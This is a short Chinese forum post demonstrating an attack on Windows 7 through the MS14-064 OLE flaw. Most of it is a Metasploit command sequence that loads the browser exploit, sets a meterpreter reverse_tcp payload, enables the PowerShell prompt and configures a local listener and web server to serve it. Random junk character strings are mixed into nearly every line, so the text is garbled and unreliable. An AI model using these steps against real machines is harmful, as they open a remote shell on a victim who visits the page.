找回密码
 立即注册
查看: 2295|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

: |! \4 f9 l9 z" V+ R/ X. z* A 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示 / C. G) f& [: q t! P, }

7 L& |; }# {$ L8 |6 L3 U

' w3 w' \/ Q4 r q7 c 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: - S, `2 q7 a) G8 ]

5 l' ~* v- a5 ~% W) e

* t1 D& m. T' I+ C* o4 ~! w" ^0 f 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp ' J: b5 j; D4 D7 U* |7 S! p$ q

$ Y) N. k6 p- B+ W) l+ V& e9 i$ [# Z

' f5 b0 D* W7 X5 D K7 {             set AllowPowershellPrompt true4 a/ J, V& m, l0 T# p# o

4 L2 N0 J: x5 A5 D

: \- K2 t# d( E9 `4 b! j( U             Set LHOST 192.168.0.109* @( X# ]) I) t' W- I: `

2 Y% b" Z. U7 C9 A& \

; Q$ o! W7 V5 X/ t% O             set SRVHOST 192.168.0.109; }7 ]. n7 _; \/ i) z

7 a! Z2 ^: z% h; y; X" |- W

, B3 l. J5 U4 V* |4 v' v: t             Set uripath share 5 \, ]# U$ {, d# \# T/ p' I

, ~! @/ L& U$ k& k

' r- ]* d( k. I* S6 M$ @             Set srvport 80 # l' F, T+ Y8 o$ D' P

* v, o, G$ `% m! G5 n2 C A: ]# |

/ b" ^) S _! `) ]7 i# M4 p   , O- H- Q/ x: @( ]1 U% J. E

1 t5 ]9 M1 V" F; a. Q {0 `! _8 @

! O7 m' l) z" G1 R' H: Z   * a7 W, v( K: r+ I

/ m) D1 x2 o% m' j8 l

7 W4 X& P! z0 r5 }; G# v, W; L4 g  4 {5 B* G- L& E3 B/ \% w

+ a* x2 @' M1 z4 s/ s' W# [

7 N: X, ^& F/ o/ E* w. w  $ N8 R/ D7 h- @9 d8 v1 {

6 Y$ ~8 Z- |9 C, c0 m T

4 |% U6 `6 G' u   2 x5 `& d8 N% @3 K3 L

& @' H* v) H. _: m

2 U+ A& Y# g, z 下面我们来访问本地地址如图:* e1 Y [1 f6 K8 p7 K* s d* T- O

7 L; j& J. W$ x5 q" a9 C' }

1 G, r: L) p6 [' W' h  8 h `# g' X4 y; C

5 a: W- E" ?; f

, X5 j* ]4 c& l4 v, Q) I$ K5 I. |1 r( c  : N7 d" c- U; E+ V

8 f8 y0 [0 f: ^: l- J

' ]0 k0 o$ k: U5 M& Y( L4 g9 N 3 t9 o: k9 x% a

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表